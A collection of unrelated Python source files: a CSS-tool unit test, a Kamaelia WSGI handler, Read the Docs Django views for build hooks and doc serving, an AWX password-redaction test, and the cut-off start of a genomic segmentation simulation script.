settings.output_file_name,
settings.output_extension,
]
project_directory = settings.project_directory
css_directory = settings.css_directory
settings.project_directory = unittest_file_path()
settings.css_directory = unittest_file_path()
current_set = {'green', }
current_css_text = b""".green {
color: green
}
"""
css_file = unittest_file_path(filename='blowdry.css') # CSS file
css_min_file = unittest_file_path(filename='blowdry.min.css') # CSS.min file
with open(css_file, 'w') as generic_file:
generic_file.write('test test test')
modify_file = unittest_file_path(filename='modify.html') # Modify file
with open(modify_file, 'w') as generic_file:
generic_file.write('<html><div class="pink-hover not-valid">Modified</div></html>')
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
class_set, css_text = blowdry.parse(recent=True, class_set=current_set, css_text=current_css_text)
self.assertTrue(expected_css_text == css_text, msg=css_text)
output = out.getvalue()
for substring in substrings:
self.assertTrue(substring in output, msg=output + '\tsubstring: ' + substring)
finally:
sys.stdout = saved_stdout
settings.project_directory = project_directory
settings.css_directory = css_directory
delete_file_paths((css_file, css_min_file, modify_file, ))
if __name__ == '__main__':
main()
| |
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import pprint
import string
import sys
import os
import re
import cStringIO
from datetime import datetime
from wsgiref.validate import validator
import LogWritable
import urls
import Axon
from Axon.ThreadedComponent import threadedcomponent
#from Axon.Component import component
import Kamaelia.Util.Log as Log
from Kamaelia.Chassis.ConnectedServer import MoreComplexServer
from Kamaelia.Protocol.HTTP.HTTPServer import HTTPServer
Axon.Box.ShowAllTransits = False
# ----------------------------------------------------------------------------------------------------
#
# Simple WSGI Handler
#
def HTML_WRAP(app):
"""
Wraps the Application object's results in HTML
"""
def gen(environ, start_response):
"""The standard WSGI interface"""
iterator = app(environ, start_response)
first_yield = iterator.next()
yield "<html>\n"
yield "<body>\n"
yield first_yield
for i in iterator:
yield i
yield "</body>\n"
yield "</html>\n"
return gen
def getServerInfo(uri_server):
split_server = uri_server.split(":")
return (split_server[0], split_server[1])
def normalizeEnviron(environ):
"""
Converts environ variables to strings for wsgi compliance and deletes extraneous
fields.
"""
header_list = []
header_dict = environ['headers']
for key in header_dict:
line = "%s: %s\n" % (key, header_dict[key])
header_list.append(line)
environ['headers'] = ''.join(header_list)
environ['peerport'] = str(environ['peerport'])
environ['localport'] = str(environ['localport'])
del environ['bad']
class _WsgiHandler(threadedcomponent):
"""Choosing to run the WSGI app in a thread rather than the same
context, this means we don't have to worry what they get up
to really"""
Inboxes = {
'inbox' : 'NOT USED',
'control' : 'NOT USED',
}
Outboxes = {
'outbox' : 'used to send page fragments',
'signal' : 'send producerFinished messages',
'_signal-lw' : 'shut down the log writable',
}
def __init__(self, app_name, app, request, log_writable, WsgiConfig):
super(_WsgiHandler, self).__init__()
self.app_name = app_name
self.request = request
self.environ = request
self.app = app
#self.log_writable = log_writable
self.log_writable = LogWritable.GetLogWritable('wsgi.log', self, '_signal-lw')
self.status = self.response_headers = False
self.wsgi_config = WsgiConfig
def main(self):
self.log_writable.activate()
self.headers = self.environ["headers"]
self.server_name, self.server_port = getServerInfo(self.request["uri-server"])
self.initRequiredVars(self.wsgi_config)
self.initOptVars(self.wsgi_config)
self.munge_headers()
#stringify all variables for wsgi compliance
normalizeEnviron(self.environ)
#PEP 333 specifies that we're not supposed to buffer output here,
#so pulling the iterator out of the app object
app_iter = self.app(self.environ, self.start_response)
first_response = app_iter.next()
if self.response_headers:
self.write(first_response)
else:
raise WsgiError()
for fragment in app_iter:
page = {
'data' : fragment,
}
self.send(page, 'outbox')
app_iter.close()
self.send(Axon.Ipc.producerFinished(self), "signal")
self.send(Axon.Ipc.shutdownMicroprocess(self), '_signal-lw')
def start_response(self, status, response_headers, exc_info=None):
"""
Method to be passed to WSGI application object
"""
#TODO: Add more exc_info support
if exc_info:
raise exc_info[0], exc_info[1], exc_info[2]
self.status = status
self.response_headers = response_headers
return self.write
def write(self, body_data):
page = {
'data' : body_data,
}
self.send(page, 'outbox')
def munge_headers(self):
for header in self.environ["headers"]:
cgi_varname = "HTTP_"+header.replace("-","_").upper()
self.environ[cgi_varname] = self.environ["headers"][header]
pprint.pprint(self.environ)
pprint.pprint(self.environ["headers"])
def generateRequestMemFile(self):
"""
Creates a memfile to be stored in wsgi.input
"""
CRLF = '\r\n'
full_request = "%s %s %s/%s%s" % \
(self.environ['method'], self.environ['raw-uri'], self.environ['protocol'], self.environ['version'], CRLF)
header_list = []
for key in self.environ['headers']:
header_list.append("%s: %s%s" % (key, self.environ['headers'][key], CRLF))
full_request = full_request + string.join(header_list) + '\n' + self.environ['body']
print "full_request: \n" + full_request
return cStringIO.StringIO(full_request)
def initRequiredVars(self, wsgi_config):
"""
This method initializes all variables that are required to be present
(including ones that could possibly be empty.
"""
self.environ["REQUEST_METHOD"] = self.request["method"]
# Portion of URL that relates to the application object.
self.environ["SCRIPT_NAME"] = self.app_name
# Remainder of request path after "SCRIPT_NAME"
self.environ["PATH_INFO"] = self.environ["uri-suffix"]
# Server name published to the outside world
self.environ["SERVER_NAME"] = self.server_name
# Server port published to the outside world
self.environ["SERVER_PORT"] = self.server_port
#Protocol to respond to
self.environ["SERVER_PROTOCOL"] = self.request["protocol"]
#==================================
#WSGI variables
#==================================
self.environ["wsgi.version"] = wsgi_config['WSGI_VER']
self.environ["wsgi.url_scheme"] = self.request["protocol"].lower()
self.environ["wsgi.errors"] = self.log_writable
self.environ["wsgi.multithread"] = False
self.environ["wsgi.multiprocess"] = False
self.environ["wsgi.run_once"] = True
self.environ["wsgi.input"] = self.generateRequestMemFile()
def initOptVars(self, wsgi_config):
"""This method initializes all variables that are optional"""
# Portion of request URL that follows the ? - may be empty or absent
if self.environ["uri-suffix"].find("?") != -1:
self.environ["QUERY_STRING"] = \
self.environ["uri-suffix"][self.environ["uri-suffix"].find("?")+1:]
else:
self.environ["QUERY_STRING"] = ""
# Contents of an HTTP_CONTENT_TYPE field
self.environ["CONTENT_TYPE"] = self.headers.get("content-type","")
# Contents of an HTTP_CONTENT_LENGTH field
self.environ["CONTENT_LENGTH"] = self.headers.get("content-length","")
#self.environ["DOCUMENT_ROOT"] = self.homedirectory
self.environ["PATH"] = os.environ['PATH']
self.environ["DATE"] = datetime.now().isoformat()
self.environ["SERVER_ADMIN"] = wsgi_config['SERVER_ADMIN']
self.environ["SERVER_SOFTWARE"] = wsgi_config['SERVER_SOFTWARE']
self.environ["SERVER_SIGNATURE"] = "%s Server at %s port %s" % \
(wsgi_config['SERVER_SOFTWARE'], self.server_name, self.server_port)
def unsupportedVars(self):
"""
Probably won't be used. This is just a list of environment variables that
aren't implemented as of yet.
"""
consider = " **CONSIDER ADDING THIS -- eg: "
self.environ["HTTP_REFERER"] = consider + "-"
self.environ["SERVER_SIGNATURE"] = consider + "...."
self.environ["SCRIPT_FILENAME"] = consider + \
"/usr/local/httpd/sites/com.thwackety/cgi/test.pl"
self.environ["REQUEST_URI"] = consider + "/cgi-bin/test.pl"
self.environ["SCRIPT_URL"] = consider + "/cgi-bin/test.pl"
self.environ["SCRIPT_URI"] = consider + "http://thwackety.com/cgi-bin/test.pl"
self.environ["REMOTE_ADDR"] = consider + "192.168.2.5"
self.environ["REMOTE_PORT"] = consider + "56669"
self.environ["GATEWAY_INTERFACE"] = consider + "CGI/1.1"
def Handler(log_writable, WsgiConfig, substituted_path):
def _getWsgiHandler(request):
requested_uri = sanitizePath(request['raw-uri'], substituted_path)
print requested_uri
for url_item in urls.UrlList:
print 'trying ' + url_item[0]
if re.search(url_item[0], requested_uri):
print url_item[0] + 'succesful!'
u, mod, app_attr, app_name = url_item
break
module = _importWsgiModule(mod)
app = getattr(module, app_attr)
return _WsgiHandler(app_name, app, request, log_writable, WsgiConfig)
return _getWsgiHandler
def HTTPProtocol():
def foo(self,**argd):
print self.routing
return HTTPServer(requestHandlers(self.routing),**argd)
return foo
class WsgiError(Exception):
def __init__(self):
super(WsgiError, self).__init__()
def _importWsgiModule(name):
"""
Just a copy/paste of the example my_import function from here:
http://docs.python.org/lib/built-in-funcs.html
"""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
def sanitizePath(uri, substituted_path):
uri = uri.replace(substituted_path, '', 1)
uri = uri.strip('/')
outputpath = []
splitpath = string.split(uri, "/")
for directory in splitpath:
if directory == ".":
pass
elif directory == "..":
if len(outputpath) > 0: outputpath.pop()
else:
outputpath.append(directory)
outputpath = '/'.join(outputpath)
return outputpath
| |
"""Core views, including the main homepage, post-commit build hook,
documentation and header rendering, and server errors.
"""
from django.contrib.auth.models import User
from django.core.urlresolvers import NoReverseMatch, reverse
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect, Http404, HttpResponseNotFound
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import RequestContext
from django.views.decorators.csrf import csrf_view_exempt
from django.views.static import serve
from django.views.generic import TemplateView
from haystack.query import EmptySearchQuerySet
from haystack.query import SearchQuerySet
from celery.task.control import inspect
from builds.models import Build
from builds.models import Version
from core.forms import FacetedSearchForm
from projects.models import Project, ImportedFile, ProjectRelationship
from projects.tasks import update_docs, remove_dir
from projects.utils import highest_version
import json
import mimetypes
import os
import logging
import redis
log = logging.getLogger(__name__)
pc_log = logging.getLogger(__name__+'.post_commit')
class NoProjectException(Exception):
pass
def homepage(request):
latest = (Project.objects.public(request.user)
.order_by('-modified_date')[:10])
featured = Project.objects.filter(featured=True)
return render_to_response('homepage.html',
{'project_list': latest,
'featured_list': featured},
context_instance=RequestContext(request))
def random_page(request, project=None):
imp_file = ImportedFile.objects.order_by('?')
if project:
return HttpResponseRedirect((imp_file.filter(project__slug=project)[0]
.get_absolute_url()))
return HttpResponseRedirect(imp_file[0].get_absolute_url())
def queue_depth(request):
r = redis.Redis(**settings.REDIS)
return HttpResponse(r.llen('celery'))
def queue_info(request):
i = inspect()
active_pks = []
reserved_pks = []
resp = ""
active = i.active()
if active:
active_json = json.loads(active)
for obj in active_json['build']:
active_pks.append(obj['kwargs']['pk'])
active_resp = "Active: %s " % " ".join(active_pks)
resp += active_resp
reserved = i.reserved()
if reserved:
reserved_json = json.loads(reserved)
for obj in reserved_json['build']:
reserved_pks.append(obj['kwargs']['pk'])
reserved_resp = " | Reserved %s" % " ".join(reserved_pks)
resp += reserved_resp
return HttpResponse(resp)
def live_builds(request):
builds = Build.objects.filter(state='building')[:5]
WEBSOCKET_HOST = getattr(settings, 'WEBSOCKET_HOST', 'localhost:8088')
count = builds.count()
percent = 100
if count > 1:
percent = 100 / count
return render_to_response('all_builds.html',
{'builds': builds,
'build_percent': percent,
'WEBSOCKET_HOST': WEBSOCKET_HOST},
context_instance=RequestContext(request))
@csrf_view_exempt
def wipe_version(request, project_slug, version_slug):
version = get_object_or_404(Version, project__slug=project_slug,
slug=version_slug)
if request.user not in version.project.users.all():
raise Http404("You must own this project to wipe it.")
del_dirs = [version.project.checkout_path(version.slug), version.project.venv_path(version.slug)]
for del_dir in del_dirs:
remove_dir.delay(del_dir)
return render_to_response('wipe_version.html',
{'del_dir': del_dir},
context_instance=RequestContext(request))
def _build_version(project, slug, already_built=()):
default = project.default_branch or (project.vcs_repo().fallback_branch)
if slug == default and slug not in already_built:
# short circuit versions that are default
# these will build at "latest", and thus won't be
# active
version = project.versions.get(slug='latest')
update_docs.delay(pk=project.pk, version_pk=version.pk, force=True)
pc_log.info(("(Version build) Building %s:%s"
% (project.slug, version.slug)))
return "latest"
elif project.versions.exclude(active=True).filter(slug=slug).exists():
pc_log.info(("(Version build) Not Building %s"% slug))
return None
elif slug not in already_built:
version = project.versions.get(slug=slug)
update_docs.delay(pk=project.pk, version_pk=version.pk, force=True)
pc_log.info(("(Version build) Building %s:%s"
% (project.slug, version.slug)))
return slug
else:
pc_log.info(("(Version build) Not Building %s"% slug))
return None
def _build_branches(project, branch_list):
for branch in branch_list:
versions = project.versions_from_branch_name(branch)
to_build = set()
not_building = set()
for version in versions:
pc_log.info(("(Branch Build) Processing %s:%s"
% (project.slug, version.slug)))
ret = _build_version(project, version.slug, already_built=to_build)
if ret:
to_build.add(ret)
else:
not_building.add(version.slug)
return (to_build, not_building)
def _build_url(url, branches):
try:
projects = Project.objects.filter(repo__contains=url)
if not projects.count():
raise NoProjectException()
for project in projects:
(to_build, not_building) = _build_branches(project, branches)
if to_build:
msg = '(URL Build) Build Started: %s [%s]' % (url, ' '.join(to_build))
pc_log.info(msg)
return HttpResponse(msg)
else:
msg = '(URL Build) Not Building: %s [%s]' % (url, ' '.join(not_building))
pc_log.info(msg)
return HttpResponse(msg)
except Exception, e:
if e.__class__ == NoProjectException:
raise
msg = "(URL Build) Failed: %s:%s" % (url, e)
pc_log.error(msg)
return HttpResponse(msg)
@csrf_view_exempt
def github_build(request):
"""
A post-commit hook for github.
"""
if request.method == 'POST':
obj = json.loads(request.POST['payload'])
url = obj['repository']['url']
ghetto_url = url.replace('http://', '').replace('https://', '')
branch = obj['ref'].replace('refs/heads/', '')
pc_log.info("(Incoming Github Build) %s [%s]" % (ghetto_url, branch))
try:
return _build_url(ghetto_url, [branch])
except NoProjectException:
try:
name = obj['repository']['name']
desc = obj['repository']['description']
homepage = obj['repository']['homepage']
repo = obj['repository']['url']
email = obj['repository']['owner']['email']
user = User.objects.get(email=email)
proj = Project.objects.create(
name=name,
description=desc,
project_url=homepage,
repo=repo,
)
proj.users.add(user)
# Version doesn't exist yet, so use classic build method
update_docs.delay(pk=proj.pk)
pc_log.info("Created new project %s" % (proj))
except Exception, e:
pc_log.error("Error creating new project %s: %s" % (name, e))
return HttpResponseNotFound('Repo not found')
@csrf_view_exempt
def bitbucket_build(request):
if request.method == 'POST':
payload = request.POST.get('payload')
pc_log.info("(Incoming Bitbucket Build) Raw: %s" % payload)
if not payload:
return HttpResponseNotFound('Invalid Request')
obj = json.loads(payload)
rep = obj['repository']
branches = [rec.get('branch', '') for rec in obj['commits']]
ghetto_url = "%s%s" % ("bitbucket.org", rep['absolute_url'].rstrip('/'))
pc_log.info("(Incoming Bitbucket Build) %s [%s]" % (ghetto_url, ' '.join(branches)))
pc_log.info("(Incoming Bitbucket Build) JSON: \n\n%s\n\n" % obj)
try:
return _build_url(ghetto_url, branches)
except NoProjectException:
pc_log.error("(Incoming Bitbucket Build) Repo not found: %s" % ghetto_url)
return HttpResponseNotFound('Repo not found: %s' % ghetto_url)
@csrf_view_exempt
def generic_build(request, pk=None):
try:
project = Project.objects.get(pk=pk)
# Allow slugs too
except (Project.DoesNotExist, ValueError):
project = Project.objects.get(slug=pk)
if request.method == 'POST':
slug = request.POST.get('version_slug', None)
if slug:
pc_log.info("(Incoming Generic Build) %s [%s]" % (project.slug, slug))
_build_version(project, slug)
else:
pc_log.info("(Incoming Generic Build) %s [%s]" % (project.slug, 'latest'))
update_docs.delay(pk=pk, force=True)
return redirect('builds_project_list', project.slug)
def subproject_list(request):
project_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
subprojects = [rel.child for rel in proj.subprojects.all()]
return render_to_response(
'projects/project_list.html',
{'project_list': subprojects},
context_instance=RequestContext(request)
)
def subproject_serve_docs(request, project_slug, lang_slug=None,
version_slug=None, filename=''):
parent_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
subproject_qs = ProjectRelationship.objects.filter(
parent__slug=parent_slug, child__slug=project_slug)
if lang_slug is None or version_slug is None:
# Handle /
version_slug = proj.get_default_version()
url = reverse('subproject_docs_detail', kwargs={
'project_slug': project_slug,
'version_slug': version_slug,
'lang_slug': proj.language,
'filename': filename
})
return HttpResponseRedirect(url)
if subproject_qs.exists():
return serve_docs(request, lang_slug, version_slug, filename,
project_slug)
else:
log.info('Subproject lookup failed: %s:%s' % (project_slug,
parent_slug))
raise Http404("Subproject does not exist")
def default_docs_kwargs(request, project_slug=None):
"""
Return kwargs used to reverse lookup a project's default docs URL.
Determining which URL to redirect to is done based on the kwargs
passed to reverse(serve_docs, kwargs). This function populates
kwargs for the default docs for a project, and sets appropriate keys
depending on whether request is for a subdomain URL, or a non-subdomain
URL.
"""
if project_slug:
try:
proj = Project.objects.get(slug=project_slug)
except (Project.DoesNotExist, ValueError):
# Try with underscore, for legacy
try:
proj = Project.objects.get(slug=project_slug.replace('-', '_'))
except (Project.DoesNotExist):
proj = None
else:
# If project_slug isn't in URL pattern, it's set in subdomain
# middleware as request.slug.
try:
proj = Project.objects.get(slug=request.slug)
except (Project.DoesNotExist, ValueError):
# Try with underscore, for legacy
try:
proj = Project.objects.get(slug=request.slug.replace('-', '_'))
except (Project.DoesNotExist):
proj = None
if not proj:
raise Http404("Project slug not found")
version_slug = proj.get_default_version()
kwargs = {
'project_slug': project_slug,
'version_slug': version_slug,
'lang_slug': proj.language,
'filename': ''
}
# Don't include project_slug for subdomains.
# That's how reverse(serve_docs, ...) differentiates subdomain
# views from non-subdomain views.
if project_slug is None:
del kwargs['project_slug']
return kwargs
def redirect_lang_slug(request, lang_slug, project_slug=None):
"""Redirect /en/ to /en/latest/."""
kwargs = default_docs_kwargs(request, project_slug)
kwargs['lang_slug'] = lang_slug
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def redirect_version_slug(request, version_slug, project_slug=None):
"""Redirect /latest/ to /en/latest/."""
kwargs = default_docs_kwargs(request, project_slug)
kwargs['version_slug'] = version_slug
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def redirect_project_slug(request, project_slug=None):
"""Redirect / to /en/latest/."""
kwargs = default_docs_kwargs(request, project_slug)
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def redirect_page_with_filename(request, filename, project_slug=None):
"""Redirect /page/file.html to /en/latest/file.html."""
kwargs = default_docs_kwargs(request, project_slug)
kwargs['filename'] = filename
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def serve_docs(request, lang_slug, version_slug, filename, project_slug=None):
if not project_slug:
project_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
ver = get_object_or_404(Version, project__slug=project_slug,
slug=version_slug)
# Auth checks
if ver not in proj.versions.public(request.user, proj, only_active=False):
res = HttpResponse("You don't have access to this version.")
res.status_code = 401
return res
# Figure out actual file to serve
if not filename:
filename = "index.html"
# This is required because we're forming the filenames outselves instead of
# letting the web server do it.
elif (proj.documentation_type == 'sphinx_htmldir'
and "_static" not in filename
and "_images" not in filename
and "html" not in filename
and not "inv" in filename):
filename += "index.html"
else:
filename = filename.rstrip('/')
# Use the old paths if we're on our old location.
# Otherwise use the new language symlinks.
# This can be removed once we have 'en' symlinks for every project.
if lang_slug == proj.language:
basepath = proj.rtd_build_path(version_slug)
else:
basepath = proj.translations_symlink_path(lang_slug)
basepath = os.path.join(basepath, version_slug)
# Serve file
log.info('Serving %s for %s' % (filename, proj))
if not settings.DEBUG:
fullpath = os.path.join(basepath, filename)
mimetype, encoding = mimetypes.guess_type(fullpath)
mimetype = mimetype or 'application/octet-stream'
response = HttpResponse(mimetype=mimetype)
if encoding:
response["Content-Encoding"] = encoding
try:
response['X-Accel-Redirect'] = os.path.join(basepath[len(settings.SITE_ROOT):],
filename)
except UnicodeEncodeError:
raise Http404
return response
else:
return serve(request, filename, basepath)
def serve_single_version_docs(request, filename, project_slug=None):
if not project_slug:
project_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
# This function only handles single version projects
if not proj.single_version:
raise Http404
return serve_docs(request, proj.language, proj.default_version,
filename, project_slug)
def server_error(request, template_name='500.html'):
"""
A simple 500 handler so we get media
"""
r = render_to_response(template_name,
context_instance=RequestContext(request))
r.status_code = 500
return r
def server_error_404(request, template_name='404.html'):
"""
A simple 500 handler so we get media
"""
r = render_to_response(template_name,
context_instance=RequestContext(request))
r.status_code = 404
return r
def divide_by_zero(request):
return 1 / 0
def morelikethis(request, project_slug, filename):
project = get_object_or_404(Project, slug=project_slug)
file = get_object_or_404(ImportedFile, project=project, path=filename)
# sqs = SearchQuerySet().filter(project=project).more_like_this(file)[:5]
sqs = SearchQuerySet().more_like_this(file)[:5]
if len(sqs):
output = [(obj.title, obj.absolute_url) for obj in sqs]
json_response = json.dumps(output)
else:
json_response = {"message": "Not Found"}
jsonp = "%s(%s)" % (request.GET.get('callback'), json_response)
return HttpResponse(jsonp, mimetype='text/javascript')
class SearchView(TemplateView):
template_name = "search/base_facet.html"
results = EmptySearchQuerySet()
form_class = FacetedSearchForm
form = None
query = ''
selected_facets = None
selected_facets_list = None
def get_context_data(self, request, **kwargs):
context = super(SearchView, self).get_context_data(**kwargs)
context['request'] = self.request
# causes solr request #1
context['facets'] = self.results.facet_counts()
context['form'] = self.form
context['query'] = self.query
context['selected_facets'] = ('&'.join(self.selected_facets)
if self.selected_facets else '')
context['selected_facets_list'] = self.selected_facets_list
context['results'] = self.results
context['count'] = len(self.results) # causes solr request #2
return context
def get(self, request, **kwargs):
"""
Performing the search causes three requests to be sent to Solr.
1. For the facets
2. For the count (unavoidable, as pagination will cause this anyay)
3. For the results
"""
self.request = request
self.form = self.build_form()
self.selected_facets = self.get_selected_facets()
self.selected_facets_list = self.get_selected_facets_list()
self.query = self.get_query()
if self.form.is_valid():
self.results = self.get_results()
context = self.get_context_data(request, **kwargs)
# For returning results partials for javascript
if request.is_ajax() or request.GET.get('ajax'):
self.template_name = 'search/faceted_results.html'
return self.render_to_response(context)
def build_form(self):
"""
Instantiates the form the class should use to process the search query.
"""
data = self.request.GET if len(self.request.GET) else None
return self.form_class(data, facets=('project',))
def get_selected_facets_list(self):
return [tuple(s.split(':')) for s in self.selected_facets if s]
def get_selected_facets(self):
"""
Returns the a list of facetname:value strings
e.g. [u'project_exact:Read The Docs', u'author_exact:Eric Holscher']
"""
return self.request.GET.getlist('selected_facets')
def get_query(self):
"""
Returns the query provided by the user.
Returns an empty string if the query is invalid.
"""
return self.request.GET.get('q')
def get_results(self):
"""
Fetches the results via the form.
"""
return self.form.search()
| |
# Python
import json
# Django
from django.core.urlresolvers import reverse
# AWX
from awx.main.models import * # noqa
from awx.main.tests.base import BaseTest, QueueStartStopTestMixin
__all__ = ['SurveyPasswordRedactedTest']
PASSWORD="5m/h"
ENCRYPTED_STR='$encrypted$'
TEST_PLAYBOOK = u'''---
- name: test success
hosts: test-group
gather_facts: True
tasks:
- name: should pass
command: echo {{ %s }}
''' % ('spot_speed')
TEST_SIMPLE_SURVEY = '''
{
"name": "Simple",
"description": "Description",
"spec": [
{
"type": "password",
"question_name": "spots speed",
"question_description": "How fast can spot run?",
"variable": "%s",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "%s"
}
]
}
''' % ('spot_speed', PASSWORD)
TEST_COMPLEX_SURVEY = '''
{
"name": "Simple",
"description": "Description",
"spec": [
{
"type": "password",
"question_name": "spots speed",
"question_description": "How fast can spot run?",
"variable": "spot_speed",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "0m/h"
},
{
"type": "password",
"question_name": "ssn",
"question_description": "What's your social security number?",
"variable": "ssn",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "999-99-9999"
},
{
"type": "password",
"question_name": "bday",
"question_description": "What's your birth day?",
"variable": "bday",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "1/1/1970"
}
]
}
'''
TEST_SINGLE_PASSWORDS = [
{
'description': 'Single instance with a . after',
'text' : 'See spot. See spot run. See spot run %s. That is a fast run.' % PASSWORD,
'passwords': [PASSWORD],
'occurances': 1,
},
{
'description': 'Single instance with , after',
'text': 'Spot goes %s, at a fast pace' % PASSWORD,
'passwords': [PASSWORD],
'occurances': 1,
},
{
'description': 'Single instance with a space after',
'text': 'Is %s very fast?' % PASSWORD,
'passwords': [PASSWORD],
'occurances': 1,
},
{
'description': 'Many instances, also with newline',
'text': 'I think %s is very very fast. If I ran %s for 4 hours how many hours would I run?.\nTrick question. %s for 4 hours would result in running for 4 hours' % (PASSWORD, PASSWORD, PASSWORD),
'passwords': [PASSWORD],
'occurances': 3,
},
]
passwd = 'my!@#$%^pass&*()_+'
TEST_SINGLE_PASSWORDS.append({
'description': 'password includes characters not in a-z 0-9 range',
'passwords': [passwd],
'text': 'Text is fun yeah with passwords %s.' % passwd,
'occurances': 1
})
# 3 because 3 password fields in spec TEST_COMPLEX_SURVEY
TEST_MULTIPLE_PASSWORDS = []
passwds = [ '65km/s', '545-83-4534', '7/4/2002']
TEST_MULTIPLE_PASSWORDS.append({
'description': '3 different passwords each used once',
'text': 'Spot runs %s. John has an ss of %s and is born on %s.' % (passwds[0], passwds[1], passwds[2]),
'passwords': passwds,
'occurances': 3,
})
TESTS = {
'simple': {
'survey' : json.loads(TEST_SIMPLE_SURVEY),
'tests' : TEST_SINGLE_PASSWORDS,
},
'complex': {
'survey' : json.loads(TEST_COMPLEX_SURVEY),
'tests' : TEST_MULTIPLE_PASSWORDS,
}
}
class SurveyPasswordBaseTest(BaseTest, QueueStartStopTestMixin):
def setUp(self):
super(SurveyPasswordBaseTest, self).setUp()
self.setup_instances()
self.setup_users()
def check_passwords_redacted(self, test, response):
self.assertIsNotNone(response['content'])
for password in test['passwords']:
self.check_not_found(response['content'], password, test['description'], word_boundary=True)
self.check_found(response['content'], ENCRYPTED_STR, test['occurances'], test['description'])
# TODO: A more complete test would ensure that the variable value isn't found
def check_extra_vars_redacted(self, test, response):
self.assertIsNotNone(response)
# Ensure that all extra_vars of type password have the value '$encrypted$'
vars = []
for question in test['survey']['spec']:
if question['type'] == 'password':
vars.append(question['variable'])
extra_vars = json.loads(response['extra_vars'])
for var in vars:
self.assertIn(var, extra_vars, 'Variable "%s" should exist in "%s"' % (var, extra_vars))
self.assertEqual(extra_vars[var], ENCRYPTED_STR)
def _get_url_job_stdout(self, job):
url = reverse('api:job_stdout', args=(job.pk,))
return self.get(url, expect=200, auth=self.get_super_credentials(), accept='application/json')
def _get_url_job_details(self, job):
url = reverse('api:job_detail', args=(job.pk,))
return self.get(url, expect=200, auth=self.get_super_credentials(), accept='application/json')
class SurveyPasswordRedactedTest(SurveyPasswordBaseTest):
'''
Transpose TEST[]['tests'] to the below format. A more flat format."
[
{
'text': '...',
'description': '...',
...,
'job': '...',
'survey': '...'
},
]
'''
def setup_test(self, test_name):
blueprint = TESTS[test_name]
self.tests[test_name] = []
job_template = self.make_job_template(survey_enabled=True, survey_spec=blueprint['survey'])
for test in blueprint['tests']:
test = dict(test)
extra_vars = {}
# build extra_vars from spec variables and passwords
for x in range(0, len(blueprint['survey']['spec'])):
question = blueprint['survey']['spec'][x]
extra_vars[question['variable']] = test['passwords'][x]
job = self.make_job(job_template=job_template)
job.extra_vars = json.dumps(extra_vars)
job.result_stdout_text = test['text']
job.save()
test['job'] = job
test['survey'] = blueprint['survey']
self.tests[test_name].append(test)
def setUp(self):
super(SurveyPasswordRedactedTest, self).setUp()
self.tests = {}
self.setup_test('simple')
self.setup_test('complex')
# should redact single variable survey
def test_redact_stdout_simple_survey(self):
for test in self.tests['simple']:
response = self._get_url_job_stdout(test['job'])
self.check_passwords_redacted(test, response)
# should redact multiple variables survey
def test_redact_stdout_complex_survey(self):
for test in self.tests['complex']:
response = self._get_url_job_stdout(test['job'])
self.check_passwords_redacted(test, response)
# should redact values in extra_vars
def test_redact_job_extra_vars(self):
for test in self.tests['simple']:
response = self._get_url_job_details(test['job'])
self.check_extra_vars_redacted(test, response)
| |
#!/usr/bin/python
import sys, getopt
from random import random
verbose = False
output = sys.stdout
from encode import *
def generateSequences(number=1, means = [0.1, 0.3, 0.5, 0.7, 0.9], meanBlockLength=1000, sdBlockLength=200, regLength=100000):
from random import gauss as normal
for i in xrange(1,number+1):
totalLength = 0;
sequences = []
for mean in means:
loop = 0;
while loop < regLength:
length = max(0, int(normal( meanBlockLength, sdBlockLength )))
if random() <= mean:
sequences.append([totalLength+loop, totalLength+loop+length])
loop += ( length + 2 )
sequences[-1][-1] = min(sequences[-1][-1], totalLength+regLength-1)
totalLength += regLength
of = open('sim_output_%i.bed' % i, 'w')
for entry in sequences:
of.write( "name\t%i\t%i\n" % tuple(entry) )
of.close()
of = open('sim_lengths.txt', 'w')
of.write("name\t0\t%i" % totalLength )
of.close()
def segment(data, minLength, b=0, maxIterations=100, M_TOL = 0):
"""A method to segment an annotation track.
"""
# an object to keep track of the scores we've already calculated
cached_scores = {}
def change_point_mle(data, lb, ub, si, bl):
"""Process 4.7 from the paper.
Data should be a cumm sum object.
"""
# if the interval isn't long enough, return 0
if ( ub - lb ) <= 2*bl: return 0
# n is the total considered interval length
# we add 1 because the interval is inclusive
n = float(ub - lb + 1)
# we add 1 to j because the interval includes data[si]
j = float(si - lb + 1)
s1_mean = float(data[si] - data[lb])/j
s2_mean = float(data[ub] - data[si+1])/(ub-si)
tot_mean = float(data[ub] - data[lb])/n
p1 = (j/n)*(s1_mean - tot_mean)**2
p2 = ((n-j)/n)*(s2_mean - tot_mean)**2
return p1+p2
def bbs_var_estimate( data, lb, ub, si, bl ):
"""Process 4.8 from the paper.
Data should be a cumm sum object.
"""
# n is the total considered interval length
# we add 1 because the interval is inclusive
n = float(ub - lb + 1)
# we add 1 to t because the interval includes data[si]
t = float(si - lb + 1)
s1_mean = float(data[si] - data[lb])/t
s2_mean = float(data[ub] - data[si+1])/(ub-si)
